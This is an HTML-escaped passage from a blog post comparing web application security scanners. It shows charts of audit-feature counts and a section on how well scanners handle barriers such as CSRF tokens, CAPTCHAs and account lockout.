&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Note&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The audit-feature count results of Webinspect may change in
the coming days due additional verification processes I&#39;m currently conducting.
If eventually there are any changes, I will announce them using the comparison
dedicated twitter account: &lt;a href=&quot;https://twitter.com/sectoolmarket&quot;&gt;@sectoolmarket&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Number of Audit Features in Scanners – Commercial/SAAS
Tools&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTkBwoGWm6cE8rj1-cgxCLb3DJ8dIvAxEQpBCklbvlYH2TF7O9lhLje4RKtr0NpFZk4W-QU_xNs9DdHUgDJ4ulFr1SEtYaYpEmQhjNb4_y7_kq_auEvliFRyX_K1l4YEyFld3owMUYzIA/s1600/%252825%2529+Test+9-+Commercial+AND+SAAS+-+Audit+Plugins+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTkBwoGWm6cE8rj1-cgxCLb3DJ8dIvAxEQpBCklbvlYH2TF7O9lhLje4RKtr0NpFZk4W-QU_xNs9DdHUgDJ4ulFr1SEtYaYpEmQhjNb4_y7_kq_auEvliFRyX_K1l4YEyFld3owMUYzIA/s1600/%252825%2529+Test+9-+Commercial+AND+SAAS+-+Audit+Plugins+Count.png&quot; height=&quot;256&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_44&quot;
 o:spid=&quot;_x0000_i1034&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:166.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image064.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;
The Number of Audit Features in Scanners – Opensource/Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_45&quot;
 o:spid=&quot;_x0000_i1033&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:334.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image066.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiDsE_4FT8czOxHvyXIntcrjyZXrvIw5mSko2G-LjXiheSfIpdtHfdmgPMva5oqyj7Wqv2_7A5cVwUOZ-9hMU7islZbPkr2YXi81umt4t0p4CP7jcPOIX3R-dcW3kCwEtEifgSbkeWm7Y/s1600/%252826%2529+Test+9-+Opensource+-+Audit+Plugins+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiDsE_4FT8czOxHvyXIntcrjyZXrvIw5mSko2G-LjXiheSfIpdtHfdmgPMva5oqyj7Wqv2_7A5cVwUOZ-9hMU7islZbPkr2YXi81umt4t0p4CP7jcPOIX3R-dcW3kCwEtEifgSbkeWm7Y/s1600/%252826%2529+Test+9-+Opensource+-+Audit+Plugins+Count.png&quot; height=&quot;516&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Number of Audit Features in Scanners – Unified List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_46&quot;
 o:spid=&quot;_x0000_i1032&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:442.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image068.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU51CpM-rmrgQGpsEAZzihGU6RYkr3QZhgwgYlmujBBNxa669cTysHVgYe5Da4vkF_CKA5shLn4uF9sa-WPvPcAT6cCW8h5V8tCyNYVzkE0oqbYQpdX_n-y0vPV_puaUbj4brDrU_G3Kc/s1600/%252827%2529+Test+9-+Unified-+Audit+Plugins+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU51CpM-rmrgQGpsEAZzihGU6RYkr3QZhgwgYlmujBBNxa669cTysHVgYe5Da4vkF_CKA5shLn4uF9sa-WPvPcAT6cCW8h5V8tCyNYVzkE0oqbYQpdX_n-y0vPV_puaUbj4brDrU_G3Kc/s1600/%252827%2529+Test+9-+Unified-+Audit+Plugins+Count.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;17. Test X - Adaptability - Scan Barriers&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Applications may contain a variety of mechanisms and
technologies that could be pose a barrier to a scanner – and in fact,
effectively prevent it from being effective when scanning the application.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scan barriers such as Anti-CSRF tokens, CAPTCHA mechanisms,
platform specific tokens (such as required viewstate values) or account lock
mechanisms have already become an integral part of &lt;b&gt;many&lt;/b&gt; applications.
Complicated RIA client technologies such as Flash, Applets and Silverlight are
certainly not rare.&amp;nbsp; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although not necessarily a measurable quality, the ability
of the scanner to handle different technologies and scan barriers is an
important perquisite, and in a sense, &lt;b&gt;almost as important&lt;/b&gt; as being able
to scan the &lt;b&gt;input delivery method&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Reasoning&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:
An automated tool can&#39;t detect a vulnerability in a point and shoot scenario if
it is can&#39;t locate and scan the vulnerable location due to the lack of
support in a certain a browser add-on, the lack of support for extracting data
from certain non-standard vectors, or the lack of support in overcoming a
specific barrier, such as a required token or challenge. The more barriers the
scanner is able to handle, the more useful it is when scanning complex
applications that employ the use of various technologies and scan barriers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The detailed comparison of the scanners support for various
barriers is documented in detail in the following of sectoolmarket:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/coverage-features-comparison-unified-list.html&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sectoolmarket.com/coverage-features-comparison-unified-list.html&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following charts show how many types of barriers each product
claims to be able to handle (note that many of these features were not
verified, and the information currently relies on documentation, research and
vendor supplied information):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Adaptability Score of Commercial/SAAS Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_47&quot;
 o:spid=&quot;_x0000_i1031&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:168pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image070.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKXkaIh9Ssd3aflcUzhGF6pCSaWYe3eJ7HVuopZCdUofBmMl6gEE5P3Yp6td7g_iyzbHXmY8nSsRfM6CjunR2gyU7Uj3Cmeke8IzCT25zuQJyrfSTVBxNEKrXFrS7gUjsptm_sDPyv8z0/s1600/%252828%2529+Test10-+Commercial+AND+SAAS+-+Coverage+Feature+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKXkaIh9Ssd3aflcUzhGF6pCSaWYe3eJ7HVuopZCdUofBmMl6gEE5P3Yp6td7g_iyzbHXmY8nSsRfM6CjunR2gyU7Uj3Cmeke8IzCT25zuQJyrfSTVBxNEKrXFrS7gUjsptm_sDPyv8z0/s1600/%252828%2529+Test10-+Commercial+AND+SAAS+-+Coverage+Feature+Count.png&quot; height=&quot;258&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Adaptability Score of Opensource/Free Scanners &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_48&quot;
 o:spid=&quot;_x0000_i1030&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:257.25pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image072.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGI3gC88ls9INea-LR7W0RTe4wqy7hi-hS7k0H9zizgrSY2QFoZHe8xhCFYXvW9gGLtU6hNj-hGZOFh00WK9OIl5fAO10nNyC3NmL_4SDTmCn0LX6vQrn2EpfnTS9FH5O77rHeSw0pGw/s1600/%252829%2529+Test10-+Opensource+-+Coverage+Feature+Count.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoGI3gC88ls9INea-LR7W0RTe4wqy7hi-hS7k0H9zizgrSY2QFoZHe8xhCFYXvW9gGLtU6hNj-hGZOFh00WK9OIl5fAO10nNyC3NmL_4SDTmCn0LX6vQrn2EpfnTS9FH5O77rHeSw0pGw/s1600/%252829%2529+Test10-+Opensource+-+Coverage+Feature+Count.png&quot; height=&quot;396&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Adaptability Score of Web Application Scanners – Unified
List&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-no-proof: yes;&quot;&gt;&lt;!--[if gte vml 1]&gt;&lt;v:shape id=&quot;Picture_x0020_50&quot;
 o:spid=&quot;_x0000_i1029&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:414.75pt;height:361.5pt;
 visibility:visible;mso-wrap-style:square&#39;&gt;
 &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image074.png&quot;
  o:title=&quot;&quot;/&gt;
&lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
